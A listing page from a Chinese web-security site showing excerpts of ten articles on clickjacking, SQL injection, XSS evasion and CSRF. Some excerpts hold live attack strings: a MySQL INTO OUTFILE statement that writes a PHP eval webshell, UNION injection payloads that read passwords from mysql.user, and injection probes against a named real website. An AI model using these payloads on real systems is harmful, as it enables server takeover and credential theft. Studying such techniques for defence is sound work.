安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
逆向工程 ExploitS 系统文档 移动安全 硬件安全 无线安全WEB安全 DataBase 神兵利刃 网络安全 编程茶楼 WooYun
返回首页
当前位置: 安云网 > 技术关注 > WEB安全 >
  • [WEB安全] Web服务器点击劫持(ClickJacking)的安全防范 日期::2018-08-09点击:170 好评:0

    一.介绍 ClickJacking即点击劫持,是一种将恶意代码经过处理使其变成透明、不可见的iframe,并将其覆盖在一个网页上,然后诱使用户在该网页上进行点击操作。通过改变iframe的在页面的位置,可以诱使用户正好点击我们设置好的透...

  • [WEB安全] mysql的outfile设置一句话 日期::2018-05-21点击:261 好评:0

    CreateTABLEa(cmdtextNOTNULL);InsertINTOa(cmd)VALUES(?phpeval($_POST[cmd]);?);selectcmdfromaintooutfileG:/xampp/phpmyadmin/phplogs.php;DropTABLEIFEXISTSa;flushlogs;...

  • [WEB安全] 解决DEDECMS历史难题--找后台目录 日期::2018-02-27点击:201 好评:0

    利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.php 大概148行左右 if($_FILES){require_once(DEDEINC./uploadsafe.inc.php);} uploadsafe.inc.php if(preg_match(#^(cfg_|GLOBALS)#,$_key)){exit(Requestvarnotallowforuploadsafe!);}$$_key=$_FILES[$_key][tmp_name];//获取t...

  • [WEB安全] 盲注学习总结 日期::2018-02-03点击:192 好评:0

    sql注入中的盲注的几种类型 1.基于时间延时注入 基于时间的手工盲注一般都是通过二分法或逐位法确定范围获取目标值。大大缩小了请求数。 通过控制,获取响应时间来判断目标值的正确性。使用大量情况,在纯盲情况下成功率...

  • [WEB安全] 一次简单的手工注入 日期::2018-02-03点击:213 好评:0

    手工SQL注入: 网址:http://battery.tcl.com/read_news.php?id=38 判断是否有注入点,通常是:单引号() and 1=1 and 1=2 http://battery.tcl.com/read_news.php?id=38 (错误) http://battery.tcl.com/read_news.php?id=38 and 1=1 (正确) http://battery.tcl.com/read_news.php?id=38...

  • [WEB安全] MYSQL注入绕过技巧 日期::2018-01-30点击:97 好评:0

    /lingdao.php?id=161.0ORDER BY%2B9 /lingdao.php?id=4.990Union(select-1.0,2,3,4,5,6,7,@@version) Article/show/id/4.0Union(select-0.1,2,USER,password,5,6,7,8,9,10,11,12,13.0FROM mysql%252euser) /lingdao.php?id=4.990Union(select-.1,password,3,4,5,6,7,8.0FROM(...

  • [WEB安全] MySQL注射的过滤绕过技巧 日期::2018-01-19点击:170 好评:2

    SQL注射的绕过技巧较多,此文仅做一些简单的总结。 前文已经提到,最好利用的注射点: 支持Union 可报错 支持多行执行、可执行系统命令、可HTTP Request等额外有利条件 若非以上类型,则可能需要暴力猜解。猜解时,可能会遇到一...

  • [WEB安全] XSS注入方式和逃避XSS过滤的常用方法 日期::2018-01-03点击:208 好评:0

    转自黑吧安全网http://www.myhack58.com/ web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过...

  • [WEB安全] 浅谈CSRF攻击方式 日期::2017-10-26点击:161 好评:0

    一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解CSRF攻击: 攻击者盗用了你的身份,以你的名义发送恶意请求...

  • [WEB安全] CSRF攻击与防御 日期::2017-10-26点击:204 好评:0

    转载地址:http://www.phpddt.com/reprint/csrf.html CSRF概念: CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求...

推荐内容